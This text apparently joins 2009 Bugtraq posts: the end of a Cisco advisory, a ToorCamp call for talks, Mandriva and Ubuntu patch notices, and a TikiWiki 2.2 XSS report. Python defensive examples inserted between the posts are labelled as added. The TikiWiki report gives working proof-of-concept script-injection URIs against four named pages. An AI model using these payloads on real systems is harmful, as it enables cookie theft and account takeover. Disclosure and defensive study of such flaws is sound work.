http://tools.cisco.com/support/downloads/go/ReleaseType.x?optPlat=&isPlatform=Y&mdfid=281941895&sftType=Unified+Communications+Manager+Updates&treeName=Voice+and+Unified+Communications&modelName=Cisco+Unified+Communications+Manager+Version+7.0&mdfLevel=Software%20Version/Option&treeMdfId=278875240&modifmdfid=null&imname=&hybrid=Y&imst=N

Workarounds
==========
It is possible to mitigate this vulnerability using the following
workarounds.

Cisco Unified Communications Manager 4.x
+---------------------------------------

It is possible to mitigate this vulnerability by moving the ASP
script that IP Phone Personal Address Book (PAB) Synchronizer
clients interact with to a directory location that is not accessible
to the Cisco Unified Communications Manager web server. The system
drive where the ASP script resides depends on how Cisco Unified
Communications Manager was installed. Employing this workaround will
prevent address book synchronization; however, the PAB application
will continue to function. The ASP script can be moved using the
following command:

    C:\> move c:\CiscoWebs\User\LDAPDetails.asp c:\temp

It is also possible to mitigate this vulnerability by implementing
filtering on screening devices or using the Windows firewall.
Administrators are advised to permit access to TCP ports 8404 and
8405 only from trusted networks.
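
One way to check that the port restriction above is actually in force is to audit connection logs for traffic to TCP 8404 and 8405 from outside the trusted networks. The following Python is an added example, not part of Cisco's advisory: the log format, addresses, trusted network and host list are all constructed for illustration, and only IPv4 lines are handled.

```python
import ipaddress
import re

# DC Directory ports named in the advisory.
PAB_LDAP_PORTS = {8404, 8405}

# Constructed values: replace with the site's own networks and servers.
TRUSTED_NETS = [ipaddress.ip_network("10.20.0.0/16")]
CUCM_HOSTS = {ipaddress.ip_address("10.20.1.10")}

# Constructed sample in a hypothetical "<time> <action> TCP src -> dst" format.
SAMPLE_LOG = """\
2009-03-11T10:00:01Z ALLOW TCP 10.20.5.17:49152 -> 10.20.1.10:8404
2009-03-11T10:00:07Z ALLOW TCP 192.0.2.44:51001 -> 10.20.1.10:8404
2009-03-11T10:00:09Z DENY TCP 198.51.100.9:40022 -> 10.20.1.10:8405
2009-03-11T10:00:12Z ALLOW TCP 192.0.2.44:51002 -> 10.20.1.10:443
2009-03-11T10:00:15Z ALLOW TCP 192.0.2.80:51500 -> 10.20.9.9:8405
truncated line without fields
"""

LINE_RE = re.compile(
    r"^(\S+) (ALLOW|DENY) TCP "
    r"(\d+\.\d+\.\d+\.\d+):(\d+) -> (\d+\.\d+\.\d+\.\d+):(\d+)$"
)


def audit(log_text, trusted_nets=TRUSTED_NETS, cucm_hosts=CUCM_HOSTS):
    """Classify untrusted-source traffic to the PAB synchronizer ports.

    'allowed_untrusted' entries mean the filter is missing or too broad;
    'blocked_untrusted' entries show the filter working.
    """
    findings = {"allowed_untrusted": [], "blocked_untrusted": [], "skipped": 0}
    for line in log_text.splitlines():
        match = LINE_RE.match(line.strip())
        if match is None:
            findings["skipped"] += 1
            continue
        timestamp, action, src, _sport, dst, dport = match.groups()
        try:
            src_ip = ipaddress.ip_address(src)
            dst_ip = ipaddress.ip_address(dst)
        except ValueError:  # e.g. an octet above 255
            findings["skipped"] += 1
            continue
        if dst_ip not in cucm_hosts or int(dport) not in PAB_LDAP_PORTS:
            continue  # not the service this workaround protects
        if any(src_ip in net for net in trusted_nets):
            continue  # expected synchronizer client
        key = "allowed_untrusted" if action == "ALLOW" else "blocked_untrusted"
        findings[key].append((timestamp, src, int(dport)))
    return findings


if __name__ == "__main__":
    result = audit(SAMPLE_LOG)
    for ts, src, port in result["allowed_untrusted"]:
        print(f"POLICY GAP {ts}: {src} reached TCP {port}")
    print(f"blocked: {len(result['blocked_untrusted'])}, "
          f"unparsed lines: {result['skipped']}")
```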

Cisco Unified Communications Manager 5.x, 6.x, 7.x
+-------------------------------------------------

It is possible to mitigate this vulnerability by restricting the
permissions of the TabSyncSysUser database user account. In the Cisco
Unified Communications Manager Administration interface, navigate to 
User Management > Application User and search for the TabSyncSysUser
account. Remove all groups from the account and change the password.
Employing this workaround will prevent address book synchronization;
however, the PAB application will continue to function.

Active Directory Integration
+---------------------------

To improve the security of Cisco Unified Communications Manager
integration with Active Directory (AD), Cisco has produced a
whitepaper that provides a detailed explanation of how to perform
Cisco Unified Communications Manager integration with AD using the
least-privileged principle. The whitepaper can be downloaded here:

http://www.cisco.com/en/US/products/sw/voicesw/ps556/products_tech_note09186a0080a83435.shtml

Additional mitigation techniques that can be deployed on Cisco
devices within the network are available in the Cisco Applied
Mitigation Bulletin companion document for this advisory:

http://www.cisco.com/warp/public/707/cisco-amb-20090311-cucmpab.shtml

Obtaining Fixed Software
=======================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.

Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml.

Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.

Customers with Service Contracts
+-------------------------------

Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com.

Customers using Third Party Support Organizations
+------------------------------------------------

Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.

The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.

Customers without Service Contracts
+----------------------------------

Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.

  * +1 800 553 2447 (toll free from within North America)
  * +1 408 526 7209 (toll call from anywhere in the world)
  * e-mail: tac@cisco.com

Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.

Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.

Exploitation and Public Announcements
====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerability described in this advisory.

The vulnerability in Cisco Unified Communications Manager 4.x
software versions was reported to Cisco by Olivier Grosjeanne of
Dimension Data France. The vulnerability in Cisco Unified
Communications Manager 5.x, 6.x and 7.x software versions was
reported by Oliver Dewdney of LBI.

Status of this Notice: FINAL
===========================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.

A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.

Distribution
===========
This advisory is posted on Cisco's worldwide website at:

http://www.cisco.com/warp/public/707/cisco-sa-20090311-cucmpab.shtml

In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.

  * cust-security-announce@cisco.com
  * first-bulletins@lists.first.org
  * bugtraq@securityfocus.com
  * vulnwatch@vulnwatch.org
  * cisco@spot.colorado.edu
  * cisco-nsp@puck.nether.net
  * full-disclosure@lists.grok.org.uk
  * comp.dcom.sys.cisco@newsgate.cisco.com

Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.

Revision History
===============
+---------------------------------------+
| Revision |               | Initial    |
| 1.0      | 2009-March-11 | public     |
|          |               | release.   |
+---------------------------------------+

Cisco Security Procedures
========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at:

http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html

This includes instructions for press inquiries regarding Cisco security notices.
All Cisco security advisories are available at:

http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (SunOS)

iD8DBQFJt9DF86n/Gc8U/uARAtjqAJ9eE9ETbc4lyUJV8GrCEmiaJeS1NACdExbB
dLmiSiaPCdGHpVKTKvZj78k�h7
-----END PGP SIGNATURE-----

Date: Wed, 11 Mar 2009 12:54:34 -0600
Message-Id: <200903111854.n2BIsYrt025782@www3.securityfocus.com>
From: h1kari@toorcon.org
To: bugtraq@securityfocus.com
Subject: TOORCAMP 2009 CALL FOR PARTICIPATION

TOORCAMP 2009 CALL FOR PARTICIPATION


INTRODUCTION

ToorCamp is the United States' first-ever full-scale hacker camp. Modelled after the camps in Holland and Germany, ToorCamp will focus on all of the technology topics that ToorCon has become famous for but will expand out into other areas of society. ToorCamp will offer 2 days of talks on many different topics -- Security, Internet, Emerging Technologies, Hardware Hacking, and Privacy are just some of the areas we will be covering. ToorCamp will also feature 2 days of hands-on workshops on a multitude of different skills that you may have never found yourself interested in learning about before. Blacksmithing, Lock Picking, Orienteering, Logic Design, Archery -- These are just a few of the topics you can expect.

ToorCamp is run by the same group that runs ToorCon and will also be heavily supported by many other hacker conferences in the US. ToorCamp will be organized as a bunch of different campsites which will be fully run by autonomous groups. We will provide the power and internet -- you provide the rest. We're heavily encouraging groups to build structures, set up art projects, throw parties, and generally do things that will show to the world that US hackers can throw a kickass hacker camp too!

Oh, and did we mention it'll be at a Titan-1 Missile Silo? We've managed to find one of the best locations in the northwest to throw this event. We've partnered with a group of people who are currently retrofitting the Silo into an ultra-secure datacenter so internet connectivity won't be a problem. ToorCamp will be situated in central Washington roughly 3 hours driving distance from Seattle and within 15 minutes drive of a private international airport. Don't miss this once in a lifetime opportunity to make history with us and help launch the first public US hacker camp!


LOGISTICS

ToorCamp will provide many of the basic hacker camp comforts such as:

- Power
- Internet

And some of the less-essential comforts such as:

- Food
- Water
- Toilets

Some optional accessories that will be available for rental are:

- Tents
- Camping mattresses
- Sleeping bags


CAMPSITE ORGANIZER SUBMISSION INFORMATION

We're looking for campsite organizers that can help out by taking charge of parts of the camp. Campsites that have at least 10 occupants will be given a 10% discount on admission for everyone registered for the campsite. Part of being a campsite organizer is helping fellow campers get shelter, community food, throwing parties, and possibly organizing group transportation out to the camp. The 10% discount refund can be given back to the campsite organizer to help fund these types of things, can be refunded to all of the campsite inhabitants, or donated to the ToorCon Foundation. To sign up for being a campsite organizer, please fill out our signup webform at:

[http://toorcamp.org/campsite-signup]


PAPER SUBMISSION INFORMATION

For ToorCamp we will be having 50-minute talks on Thursday, 20-minute talks on Friday, and then hands-on workshops throughout the weekend. To submit a talk for the conference, please fill out the information below and email to cfp@toorcamp.org:

0. Name
1. Email Address
2. Mobile Phone Number
3. Brief Bio
4. Title of the Talk
5. Brief Abstract
6. Any supporting materials, links, outlines, etc
7. What talk format are you submitting for:
    0. 20-minute talk
    1. 50-minute talk
    2. 1-day workshop
    3. 2-day workshop


DISCLAIMERS

ToorCamp has full permission to record and republish any material that is presented at the conference.


REASONS TO SUBMIT A TALK

- The fame and prestige of presenting at the first public US hacker camp!
- Invitations to all of the parties and special events
- Sorry, we are not able to cover air travel expenses but we will try to provide campsite accommodations if requested


SPONSORSHIP

ToorCamp has many levels of sponsorship for companies that want to help make history. We're currently looking for sponsors for the conference and the Missile Silo owners are also looking for sponsors and potential partners to help them build out their ultra-secure datacenter. For more information on sponsorship opportunities, please email geo@toorcon.org.


REGISTRATION

Pre-registration is currently open at $150. The price will slowly increase every month until it's $350 at the gate, so don't miss out on this amazing price for 4 full days of camping, talks, workshops, and non-stop entertainment at one of the best locations in the northwest. Once you're registered you'll have access to our planning, talks, and rideshare discussion forums. To pre-register, we've set up registration on our website linked below.

[http://toorcamp.org/Registration]


LOCATION INFO

ToorCamp 2009
Titan-1 Missile Silo
July 2nd-5th, 2009
Moses Lake, WA

[http://www.toorcamp.org]


IMPORTANT DATES

March 10th, 2009 - Call for Participation Opens

April 3rd, 2009 - First Round of Registration Closes

May 1st, 2009 - Second Round of Registration Closes
May 1st, 2009 - First round of selection announced
May 15th, 2009 - Second round of selection announced
May 29th, 2009 - Call for Papers closes

June 5th, 2009 - Third Round of Registration Closes
June 5th, 2009 - Speaker & sponsor selection finalized

July 1st, 2009 - Move into ToorCamp
July 2nd, 2009 - ToorCamp 50-minute Talks
July 3rd, 2009 - ToorCamp 20-minute Talks
July 4th, 2009 - ToorCamp Workshops
July 5th, 2009 - ToorCamp Workshops
July 6th, 2009 - Move out of ToorCamp

Date: Thu, 12 Mar 2009 02:54:41 -0600
Message-Id: <200903120854.n2C8sfs8027843@www3.securityfocus.com>
From: iliz-z@yandex.rui
To: bugtraq@securityfocus.com
Subject: TikiWiki 2.2 XSS Vulnerability in URI

Application: TikiWiki
Version: 2.2 (latest)
Website: www.tikiwiki.org

Bug: Active XSS in URI

Exploitation: Remote
Date: 12 Mar 2009

Discovered by: iliz
Author: iliz
Contact: e-mail: iliz-z(at)yandex(dot)ru

Bug Description:
TikiWiki version 2.2 and later uses the URI in the HTML response body and fails to sanitize it. It is therefore prone to an Active XSS attack.

PROOF OF CONCEPT:
/tiki-galleries.php/>"><Script>alert(1)</scRipt>
/tiki-list_file_gallery.php/>"><Script>alert(2)</scRipt>
/tiki-listpages.php/>"><Script>alert(3)</scRipt>
/tiki-orphan_pages.php/>"><Script>alert(4)</scRipt>

The JavaScript code will be executed in the context of the victim's
browser; this can be exploited to steal cookies and escalate
privileges to administrator.

Tested with TikiWiki 2.2, Apache 2.2, Mozilla Firefox 3.0.6, Internet Explorer 7, Opera 9.65
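An added example, not part of the original post and not TikiWiki code: the unescaped reflection the report describes next to an escaped version, plus a log check for requests that append HTML metacharacters after a `.php` script name. The `<form action>` output context, the Apache-style log format and all function names are assumptions; the log lines are constructed.

```python
import html
import re
from urllib.parse import unquote

# Constructed access-log lines (documentation IPs). Script names are the ones
# listed in the report; the Apache-style layout is an assumption.
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Mar/2009:09:00:01 +0000] "GET /tiki-listpages.php?offset=20 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [12/Mar/2009:09:00:07 +0000] "GET /tiki-galleries.php/%3E%22%3E%3CScript%3Ealert(1)%3C/scRipt%3E HTTP/1.1" 200 7311',
    '192.0.2.10 - - [12/Mar/2009:09:00:15 +0000] "GET /tiki-orphan_pages.php/print HTTP/1.1" 200 4800',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<path>\S+) HTTP/[\d.]+"')
# A script name ending in .php followed by extra path data before any query string.
PATHINFO_RE = re.compile(r"^(?P<script>/[^?\s]*?\.php)/(?P<extra>[^?]*)")
HTML_META = frozenset("<>\"'")


def render_unescaped(request_uri: str) -> str:
    """Behaviour the report describes: the URI is copied into the page as-is.
    The <form action> context is an assumption made for illustration."""
    return '<form action="' + request_uri + '" method="post">'


def render_escaped(request_uri: str) -> str:
    """Same output with the URI HTML-escaped for an attribute context."""
    return '<form action="' + html.escape(request_uri, quote=True) + '" method="post">'


def decode_fully(value: str, max_rounds: int = 3) -> str:
    """Undo nested percent-encoding so the check sees the characters the
    application would eventually emit."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_path(request_path: str) -> bool:
    """True when data appended after a .php script name contains HTML metacharacters."""
    match = PATHINFO_RE.match(request_path)
    if not match:
        return False
    extra = decode_fully(match.group("extra"))
    return any(ch in HTML_META for ch in extra)


def scan_access_log(lines):
    """Return the request paths worth reviewing, in log order."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if match and suspicious_path(match.group("path")):
            hits.append(match.group("path"))
    return hits


if __name__ == "__main__":
    for path in scan_access_log(SAMPLE_LOG):
        print("review:", path)
```

Escaping at output time is the fix; the log scan only helps find requests that reached an unpatched instance.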



To: bugtraq@securityfocus.com
Subject: [ MDVSA-2009:072 ] perl-MDK-Common
Date: Wed, 11 Mar 2009 20:29:00 +0100
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1LhU6u-0002dS-Sa@titan.mandriva.com>


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:072
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : perl-MDK-Common
 Date    : March 10, 2009
 Affected: 2008.0, 2008.1, 2009.0, Corporate 3.0, Corporate 4.0,
           Multi Network Firewall 2.0
 _______________________________________________________________________

 Problem Description:

 Some vulnerabilities were discovered and corrected in perl-MDK-Common:
 
 The functions used to write strings into shell-like configuration files
 by Mandriva tools were not taking care of some special characters. This
 could lead to some bugs (like wireless keys containing certain
 characters not working), and privilege escalation. This update fixes
 that issue by ensuring proper protection of strings.
 
 The updated packages have been patched to correct these issues.
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2008.0:
 255c507faad86d74633fea56446b9f89  2008.0/i586/perl-MDK-Common-1.2.9-1.1mdv2008.0.noarch.rpm 
 4f83f9416037cd3775b255511ed99aaf  2008.0/SRPMS/perl-MDK-Common-1.2.9-1.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 6ac913c2551578cbb10713db5141ab72  2008.0/x86_64/perl-MDK-Common-1.2.9-1.1mdv2008.0.noarch.rpm 
 4f83f9416037cd3775b255511ed99aaf  2008.0/SRPMS/perl-MDK-Common-1.2.9-1.1mdv2008.0.src.rpm

 Mandriva Linux 2008.1:
 8f3509691549b62e7da2682984f4c888  2008.1/i586/perl-MDK-Common-1.2.12-1.1mdv2008.1.noarch.rpm 
 f1919920b9fcca35dcd0033f0a19e236  2008.1/SRPMS/perl-MDK-Common-1.2.12-1.1mdv2008.1.src.rpm

 Mandriva Linux 2008.1/X86_64:
 4c25f8f946005b77d7581639ca544ae8  2008.1/x86_64/perl-MDK-Common-1.2.12-1.1mdv2008.1.noarch.rpm 
 f1919920b9fcca35dcd0033f0a19e236  2008.1/SRPMS/perl-MDK-Common-1.2.12-1.1mdv2008.1.src.rpm

 Mandriva Linux 2009.0:
 31fda6d87bf3ef9dfb9d9e4919c62f75  2009.0/i586/perl-MDK-Common-1.2.14-1.1mdv2009.0.noarch.rpm 
 073a35460e25c90234c75a66d1779609  2009.0/SRPMS/perl-MDK-Common-1.2.14-1.1mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 93b0176cd4b5856e2a02f4af15a7f002  2009.0/x86_64/perl-MDK-Common-1.2.14-1.1mdv2009.0.noarch.rpm 
 073a35460e25c90234c75a66d1779609  2009.0/SRPMS/perl-MDK-Common-1.2.14-1.1mdv2009.0.src.rpm

 Corporate 3.0:
 df26c59475110bd53b5f288f11a53d57  corporate/3.0/i586/perl-MDK-Common-1.1.11-3.1.C30mdk.i586.rpm
 0d7c3fa75f2e835ab1237fda5cc10387  corporate/3.0/i586/perl-MDK-Common-devel-1.1.11-3.1.C30mdk.i586.rpm 
 dc24b24dbf8a233cbd10f92ab8a3f5a4  corporate/3.0/SRPMS/perl-MDK-Common-1.1.11-3.1.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 c6c00d568f5e7f48bcf8769a75dfaef2  corporate/3.0/x86_64/perl-MDK-Common-1.1.11-3.1.C30mdk.x86_64.rpm
 f16597e275371d2f40d8ec9723b6f770  corporate/3.0/x86_64/perl-MDK-Common-devel-1.1.11-3.1.C30mdk.x86_64.rpm 
 dc24b24dbf8a233cbd10f92ab8a3f5a4  corporate/3.0/SRPMS/perl-MDK-Common-1.1.11-3.1.C30mdk.src.rpm

 Corporate 4.0:
 b53e8db2c3804b36c17921bd886b2c23  corporate/4.0/i586/perl-MDK-Common-1.1.24-1.1.20060mlcs4.i586.rpm
 72122ed2463be591ea5c8d3763aaac1a  corporate/4.0/i586/perl-MDK-Common-devel-1.1.24-1.1.20060mlcs4.i586.rpm 
 97b7bbf36c56e079497bb15a38cdd06e  corporate/4.0/SRPMS/perl-MDK-Common-1.1.24-1.1.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 5476a172d15b9985491cee4b5ba914d4  corporate/4.0/x86_64/perl-MDK-Common-1.1.24-1.1.20060mlcs4.x86_64.rpm
 ecea123e2aad11416a8abd079a5b93ec  corporate/4.0/x86_64/perl-MDK-Common-devel-1.1.24-1.1.20060mlcs4.x86_64.rpm 
 97b7bbf36c56e079497bb15a38cdd06e  corporate/4.0/SRPMS/perl-MDK-Common-1.1.24-1.1.20060mlcs4.src.rpm

 Multi Network Firewall 2.0:
 d1b3d790798d9252553c95e4fe1e90e9  mnf/2.0/i586/perl-MDK-Common-1.1.11-3.1.C30mdk.i586.rpm
 219d2d7cf2b4c745b2952ee75a2009e1  mnf/2.0/i586/perl-MDK-Common-devel-1.1.11-3.1.C30mdk.i586.rpm 
 f2c76192a4d62ae3702de73abda0884e  mnf/2.0/SRPMS/perl-MDK-Common-1.1.11-3.1.C30mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJt+NbmqjQ0CJFipgRAvINAKC3d7iuv+HEVUIRh2Rn8BggyZ10rACfX9f1
UXe9rhwuBhlRn6iP5nwztoE=+T8R
-----END PGP SIGNATURE-----
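An added example, not Mandriva's Perl code: a writer for `KEY=value` lines in a shell-like configuration file, once without protecting the value and once with POSIX single-quote protection via Python's `shlex.quote` (a swapped-in technique; the advisory does not say how the fix quotes). The `WIRELESS_KEY` name, the sample value and all function names are hypothetical.

```python
import shlex


def write_unprotected(key: str, value: str) -> str:
    """Assumed pre-fix style: wrap the value in double quotes, escape nothing."""
    return f'{key}="{value}"'


def write_protected(key: str, value: str) -> str:
    """Protect the value so a POSIX shell reads it back as one literal word."""
    return f"{key}={shlex.quote(value)}"


def read_back(line: str) -> str:
    """Tokenise the line as a POSIX shell would (no expansion) and return the value.
    Raises ValueError on unbalanced quotes or when the value splits into words."""
    tokens = shlex.split(line, posix=True)
    if len(tokens) != 1:
        raise ValueError("assignment does not parse as a single shell word")
    _key, sep, value = tokens[0].partition("=")
    if not sep:
        raise ValueError("not a KEY=value line")
    return value


def shell_would_expand(rhs: str) -> bool:
    """True if $ or a backtick appears where a shell sourcing the file would
    expand it, i.e. anywhere outside single quotes and not backslash-escaped."""
    state = None  # None, "'" or '"'
    i = 0
    while i < len(rhs):
        ch = rhs[i]
        if state == "'":
            if ch == "'":
                state = None
        elif ch == "\\":
            i += 1  # skip the escaped character
        elif ch in "$`":
            return True
        elif ch == '"':
            state = None if state == '"' else '"'
        elif ch == "'" and state is None:
            state = "'"
        i += 1
    return False


def audit(writer, key: str, value: str) -> dict:
    """Write the value, then report whether it survives a round trip and
    whether any part of it would be interpreted when the file is sourced."""
    line = writer(key, value)
    try:
        intact = read_back(line) == value
    except ValueError:
        intact = False
    rhs = line.partition("=")[2]
    return {"line": line, "intact": intact, "expands": shell_would_expand(rhs)}


if __name__ == "__main__":
    sample = 'Tr0ub$dor"3'  # constructed wireless key with special characters
    for writer in (write_unprotected, write_protected):
        print(writer.__name__, audit(writer, "WIRELESS_KEY", sample))
```

The unprotected line both corrupts the key (the functional bug the advisory mentions) and leaves `$` live for expansion when the file is sourced, which is where the privilege concern comes from.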

To: bugtraq@securityfocus.com
Subject: [ MDVSA-2009:073 ] sarg
Date: Wed, 11 Mar 2009 22:45:01 +0100
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1LhWEX-000361-Ff@titan.mandriva.com>


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:073
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : sarg
 Date    : March 10, 2009
 Affected: 2008.0, Multi Network Firewall 2.0
 _______________________________________________________________________

 Problem Description:

 Various stack buffer overflows were discovered and corrected in sarg:
 
 Additionally the previous release fixed CVE-2008-1922
 
 The updated packages have been patched to correct these issues.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1922
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2008.0:
 15220d1d19df7866158faf5691091db1  2008.0/i586/sarg-2.2.5-0.3mdv2008.0.i586.rpm 
 e90b1965c741b0411cc26dc0a3076f43  2008.0/SRPMS/sarg-2.2.5-0.3mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 72be1a3b7331854ec27678985fa11fa9  2008.0/x86_64/sarg-2.2.5-0.3mdv2008.0.x86_64.rpm 
 e90b1965c741b0411cc26dc0a3076f43  2008.0/SRPMS/sarg-2.2.5-0.3mdv2008.0.src.rpm

 Multi Network Firewall 2.0:
 a16192924303d6a30611345c0cdd5226  mnf/2.0/i586/sarg-2.2.5-0.2.M20mdk.i586.rpm 
 076cfa3458dbc3c71eda0ccfe948c7fb  mnf/2.0/SRPMS/sarg-2.2.5-0.2.M20mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJuAW5mqjQ0CJFipgRAsT4AJ9w/38BPgfFfnwBIVKWC+Z5piSEXACeNAKl
Unu1AVagIifyvkrR/7PV/ZI=aSyT
-----END PGP SIGNATURE-----

Subject: [USN-726-1] curl vulnerability
From: Marc Deslauriers <marc.deslauriers@canonical.com>
To: ubuntu-security-announce@lists.ubuntu.com
Date: Tue, 03 Mar 2009 14:44:12 -0500
Message-Id: <1236109452.6589.18.camel@mdlinux.technorage.com>
Cc: full-disclosure@lists.grok.org.uk, "bugtraq@securityfocus.com" <bugtraq@securityfocus.com>

===========================================================
Ubuntu Security Notice USN-726-1             March 03, 2009
curl vulnerability
CVE-2009-0037
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  libcurl3                        7.15.1-1ubuntu3.1
  libcurl3-gnutls                 7.15.1-1ubuntu3.1

Ubuntu 7.10:
  libcurl3                        7.16.4-2ubuntu1.1
  libcurl3-gnutls                 7.16.4-2ubuntu1.1

Ubuntu 8.04 LTS:
  libcurl3                        7.18.0-1ubuntu2.1
  libcurl3-gnutls                 7.18.0-1ubuntu2.1

Ubuntu 8.10:
  libcurl3                        7.18.2-1ubuntu4.1
  libcurl3-gnutls                 7.18.2-1ubuntu4.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

It was discovered that curl did not enforce any restrictions when following
URL redirects. If a user or automated system were tricked into opening a URL to
an untrusted server, an attacker could use redirects to gain access to arbitrary
files. This update changes curl behavior to prevent following "file" URLs after
a redirect.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.15.1-1ubuntu3.1.diff.gz
      Size/MD5:   187821 98a6bc2adb5c5673bdf39e10459be0e8
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.15.1-1ubuntu3.1.dsc
      Size/MD5:      946 54356fc9d1f2f629db92aec10f15ad52
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.15.1.orig.tar.gz
      Size/MD5:  1769992 63be206109486d4653c73823aa2b34fa

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-dev_7.15.1-1ubuntu3.1_all.deb
      Size/MD5:    31260 e1a1c7938bbc15a8f1183fe1d6d0af0a

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.15.1-1ubuntu3.1_amd64.deb
      Size/MD5:   169568 1315f552c57d7db1315f81b41589792c
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-dbg_7.15.1-1ubuntu3.1_amd64.deb
      Size/MD5:   540736 bb54db6af7f71e8098b99f57c55a8c03
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls-dev_7.15.1-1ubuntu3.1_amd64.deb
